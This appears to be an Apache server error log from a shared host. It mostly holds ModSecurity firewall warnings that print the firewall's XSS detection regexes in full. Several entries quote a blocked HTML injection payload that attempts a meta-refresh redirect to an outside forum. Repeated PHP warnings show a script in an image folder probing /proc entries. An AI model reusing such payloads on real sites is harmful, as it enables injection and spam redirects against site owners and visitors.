[Tue May 12 03:14:25.482577 2026] [core:error] [pid 1730207:tid 1730210] [client 51.159.210.94:38954] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:14:25.482876 2026] [core:error] [pid 1730207:tid 1730210] [client 51.159.210.94:38954] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1712460/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1712460/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1712460/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1712460/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1712460/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1712460/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/228/task/228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/228/task/228/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/228/task/228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/228/task/228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/228/task/228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/228/task/228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:16:04.294330 2026] [security2:error] [pid 1730175:tid 1730198] [client 170.106.110.146:55214] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/chat-bot/"] [unique_id "agJ_VHo6NvB9WXx5V-5_8wAAARU"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705481/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705481/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705481/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705481/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1705481/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1705481/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:16:20.736556 2026] [security2:error] [pid 1691274:tid 1691280] [client 194.233.64.127:57524] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://oke.zone/viewtopic.php?id=535408>https://oke.zone</a><meta http-equiv=refresh content=0;url=https://oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZFfdQaraX_prmqcmWwAAAAM"]
[Tue May 12 03:16:20.736930 2026] [security2:error] [pid 1691274:tid 1691280] [client 194.233.64.127:57524] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZFfdQaraX_prmqcmWwAAAAM"]
[Tue May 12 03:16:20.737076 2026] [security2:error] [pid 1691274:tid 1691280] [client 194.233.64.127:57524] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZFfdQaraX_prmqcmWwAAAAM"]
[Tue May 12 03:16:20.737165 2026] [security2:error] [pid 1691274:tid 1691280] [client 194.233.64.127:57524] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSen [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZFfdQaraX_prmqcmWwAAAAM"]
[Tue May 12 03:16:20.737341 2026] [security2:error] [pid 1691274:tid 1691280] [client 194.233.64.127:57524] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZFfdQaraX_prmqcmWwAAAAM"]
[Tue May 12 03:16:20.737682 2026] [security2:error] [pid 1691274:tid 1691280] [client 194.233.64.127:57524] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZFfdQaraX_prmqcmWwAAAAM"]
[Tue May 12 03:16:20.737945 2026] [security2:error] [pid 1691274:tid 1691280] [client 194.233.64.127:57524] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZFfdQaraX_prmqcmWwAAAAM"]
[Tue May 12 03:16:21.399619 2026] [security2:error] [pid 1730175:tid 1730195] [client 194.233.64.127:57534] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://oke.zone/viewtopic.php?id=535408>https://oke.zone</a><meta http-equiv=refresh content=0;url=https://oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZXo6NvB9WXx5V-6AGAAAARI"]
[Tue May 12 03:16:21.400164 2026] [security2:error] [pid 1730175:tid 1730195] [client 194.233.64.127:57534] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZXo6NvB9WXx5V-6AGAAAARI"]
[Tue May 12 03:16:21.400337 2026] [security2:error] [pid 1730175:tid 1730195] [client 194.233.64.127:57534] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 /> found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAP [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZXo6NvB9WXx5V-6AGAAAARI"]
[Tue May 12 03:16:21.400453 2026] [security2:error] [pid 1730175:tid 1730195] [client 194.233.64.127:57534] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSen [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZXo6NvB9WXx5V-6AGAAAARI"]
[Tue May 12 03:16:21.400633 2026] [security2:error] [pid 1730175:tid 1730195] [client 194.233.64.127:57534] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://.p.e.r.les.c@pezedium.free.fr/?a[]=<a href=https://Oke.zone/viewtopic.php?id=535408>https://Oke.zone</a><meta http-equiv=refresh content=0;url=https://Oke.zone/viewtopic.php?id=535408 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZXo6NvB9WXx5V-6AGAAAARI"]
[Tue May 12 03:16:21.400993 2026] [security2:error] [pid 1730175:tid 1730195] [client 194.233.64.127:57534] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZXo6NvB9WXx5V-6AGAAAARI"]
[Tue May 12 03:16:21.401363 2026] [security2:error] [pid 1730175:tid 1730195] [client 194.233.64.127:57534] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ_ZXo6NvB9WXx5V-6AGAAAARI"]
[Tue May 12 03:16:31.511458 2026] [security2:error] [pid 1695975:tid 1695978] [client 43.153.26.165:36280] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agJ_b9VI9ymHBxup74-RmwAAAIA"]
[Tue May 12 03:16:34.900373 2026] [security2:error] [pid 1691274:tid 1691295] [client 43.153.26.165:37158] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agJ_clfdQaraX_prmqcmXwAAABM"], referer: http://www.jeanboyault.fr
PHP Warning:  filesize(): stat failed for /proc/11/task/11/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/11/task/11/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/11/task/11/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/11/task/11/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/11/task/11/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/11/task/11/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/97/task/97/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/97/task/97/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/97/task/97/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/97/task/97/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/97/task/97/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/97/task/97/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:18:01.557352 2026] [security2:error] [pid 1707624:tid 1707700] [client 170.106.180.139:47916] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/gallery/grossesses/"] [unique_id "agJ_ybOxS7i6i_mT2NLPLgAAAFI"]
[Tue May 12 03:18:05.412587 2026] [security2:error] [pid 1709071:tid 1709089] [client 43.156.125.227:57750] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agJ_zbvMumyrWMfSu7qw2AAAAMI"]
[Tue May 12 03:18:08.852352 2026] [access_compat:error] [pid 1691274:tid 1691282] [client 129.146.16.50:65130] AH01797: client denied by server configuration: /home/krakouka/public_html/wp-content/uploads/wp-statistics/
[Tue May 12 03:18:09.190944 2026] [access_compat:error] [pid 1691274:tid 1691282] [client 129.146.16.50:65130] AH01797: client denied by server configuration: /home/krakouka/public_html/wp-content/uploads/wp-statistics/
[Tue May 12 03:18:09.634487 2026] [security2:error] [pid 1730207:tid 1730210] [client 43.156.125.227:35498] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pieces/au-cas-ou-le-corps-exulte/"] [unique_id "agJ_0Tue9Sp-pIv_Bb6YogAAAUE"], referer: https://www.maelbailly.fr/?p=439
[Tue May 12 03:18:27.729617 2026] [security2:error] [pid 1730175:tid 1730193] [client 43.134.111.142:34534] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ventes-privees-auto.fr"] [uri "/"] [unique_id "agJ_43o6NvB9WXx5V-6BLgAAARA"]
[Tue May 12 03:18:50.117516 2026] [authz_core:error] [pid 1691274:tid 1691282] [client 129.146.16.50:65130] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/error_log
[Tue May 12 03:18:50.633524 2026] [authz_core:error] [pid 1691274:tid 1691282] [client 129.146.16.50:65130] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/error_log
[Tue May 12 03:18:57.184035 2026] [ssl:error] [pid 1691274:tid 1691288] (EAI 2)Name or service not known: [client 40.160.231.23:55718] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 03:18:57.184947 2026] [ssl:error] [pid 1691274:tid 1691288] AH01941: stapling_renew_response: responder error
[Tue May 12 03:19:10.862734 2026] [security2:error] [pid 1709071:tid 1709107] [client 43.128.87.4:54892] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "maelbailly.fr"] [uri "/"] [unique_id "agKADrvMumyrWMfSu7qxHgAAANQ"]
